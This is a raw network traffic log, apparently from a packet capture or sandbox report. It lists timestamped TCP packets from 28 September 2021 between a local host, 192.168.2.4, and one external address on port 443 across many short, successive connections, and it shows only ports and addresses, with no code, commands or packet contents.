Sep 28, 2021 08:00:02.821001053 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.821021080 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.922122955 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.922195911 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.922290087 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.922811985 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.923877954 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.923943043 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.924073935 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.924441099 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.924468040 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.981049061 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.985150099 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.985191107 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.985491037 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.985513926 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.085136890 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.085232973 CEST	443	50156	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.085341930 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.085822105 CEST	50156	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.086541891 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.086590052 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.086718082 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.087016106 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.087033987 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.145492077 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.148653984 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.148699999 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.148794889 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.148804903 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.401156902 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.401247978 CEST	443	50157	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.402019024 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.402400017 CEST	50157	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.403039932 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.403096914 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.403805017 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.404083014 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.404103041 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.463639975 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.466317892 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.466351986 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.467773914 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.467797041 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.751518965 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.751615047 CEST	443	50158	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.751794100 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.752311945 CEST	50158	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.752948999 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.752988100 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.753334045 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.753372908 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.753382921 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.810278893 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.813594103 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.813628912 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.814058065 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.814075947 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.921534061 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.921629906 CEST	443	50159	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.922853947 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.922893047 CEST	50159	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.923763037 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.923811913 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.924029112 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.924325943 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.924349070 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.982438087 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.985743046 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.985816956 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:03.985939980 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:03.985955000 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.099961042 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.100099087 CEST	443	50160	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.100244045 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.100761890 CEST	50160	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.104146957 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.104217052 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.109867096 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.109915972 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.109935045 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.167637110 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.171174049 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.171219110 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.171749115 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.171762943 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.292560101 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.292659044 CEST	443	50161	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.293207884 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.293240070 CEST	50161	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.293787003 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.293819904 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.294114113 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.294162989 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.294168949 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.354084015 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.358431101 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.358463049 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.358598948 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.358607054 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.463171005 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.463283062 CEST	443	50162	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.464555025 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.464555979 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.464591980 CEST	50162	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.464607954 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.464729071 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.464975119 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.464991093 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.520644903 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.524863958 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.524900913 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.525095940 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.525104046 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.627810001 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.627882957 CEST	443	50163	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.628020048 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.628463984 CEST	50163	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.629452944 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.629487991 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.629601955 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.629887104 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.629903078 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.686172962 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.688838959 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.688863993 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.688941002 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.688950062 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.811301947 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.811373949 CEST	443	50164	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.811507940 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.812006950 CEST	50164	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.812722921 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.812756062 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.812875032 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.813173056 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.813184023 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.870418072 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.873393059 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.873420954 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:04.873511076 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:04.873519897 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.005919933 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.005990028 CEST	443	50165	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.006151915 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.006517887 CEST	50165	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.007178068 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.007220030 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.007339954 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.007616043 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.007635117 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.065818071 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.069731951 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.070832968 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.071048021 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.071068048 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.185614109 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.185707092 CEST	443	50166	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.185781956 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.186229944 CEST	50166	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.187412024 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.187448978 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.187941074 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.187973976 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.187980890 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.248096943 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.252327919 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.252352953 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.255584002 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.255593061 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.344047070 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.344129086 CEST	443	50167	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.344218969 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.345160961 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.345211983 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.345627069 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.346015930 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.346034050 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.346110106 CEST	50167	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.401854038 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.403845072 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.403876066 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.403965950 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.403983116 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.524235010 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.524318933 CEST	443	50168	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.524386883 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.524967909 CEST	50168	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.525743008 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.525778055 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.525867939 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.526187897 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.526199102 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.582714081 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.585853100 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.585880041 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.585953951 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.585962057 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.699281931 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.699357986 CEST	443	50169	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.699486971 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.699923038 CEST	50169	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.700633049 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.700678110 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.700799942 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.701195955 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.701215982 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.757323027 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.760833025 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.760871887 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.760960102 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.760970116 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.884305000 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.884402037 CEST	443	50170	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.884479046 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.884974003 CEST	50170	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.886065006 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.886111021 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.886506081 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.886549950 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.886562109 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.942857981 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.946269035 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.946290970 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:05.946697950 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:05.946707010 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.079251051 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.079328060 CEST	443	50171	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.079967022 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.080004930 CEST	50171	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.080744028 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.080790043 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.080876112 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.081178904 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.081192970 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.137463093 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.140539885 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.140573978 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.140647888 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.140660048 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.254991055 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.255083084 CEST	443	50172	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.255150080 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.255559921 CEST	50172	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.256238937 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.256268978 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.256717920 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.256747961 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.256752968 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.314496040 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.318841934 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.318876982 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.323170900 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.323191881 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.441602945 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.441694975 CEST	443	50173	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.441874027 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.442862988 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.442898035 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.442954063 CEST	50173	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.443031073 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.443419933 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.443430901 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.499438047 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.502185106 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.502212048 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.502283096 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.502293110 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.607969046 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.608057022 CEST	443	50174	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.608149052 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.608469009 CEST	50174	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.609129906 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.609167099 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.609277964 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.609827042 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.609837055 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.668122053 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.671721935 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.671746969 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.671818972 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.671827078 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.792726994 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.792807102 CEST	443	50175	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.792958021 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.793658972 CEST	50175	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.794641018 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.794668913 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.794753075 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.795054913 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.795072079 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.851039886 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.854310036 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.854341030 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.854409933 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.854424953 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.954462051 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.954547882 CEST	443	50176	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.956075907 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.956108093 CEST	50176	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.956729889 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.956835032 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:06.958863974 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.958906889 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:06.958919048 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.024740934 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.027863979 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.027915955 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.029366016 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.029392004 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.144260883 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.144340992 CEST	443	50177	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.144453049 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.144871950 CEST	50177	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.145602942 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.145642042 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.145764112 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.146003962 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.146015882 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.202749014 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.206063032 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.206098080 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.206231117 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.206242085 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.326853991 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.327070951 CEST	443	50178	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.327212095 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.327589989 CEST	50178	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.328809023 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.328847885 CEST	443	50179	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:07.329294920 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.329499960 CEST	50179	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:07.329516888 CEST	443	50179	149.154.167.220	192.168.2.4
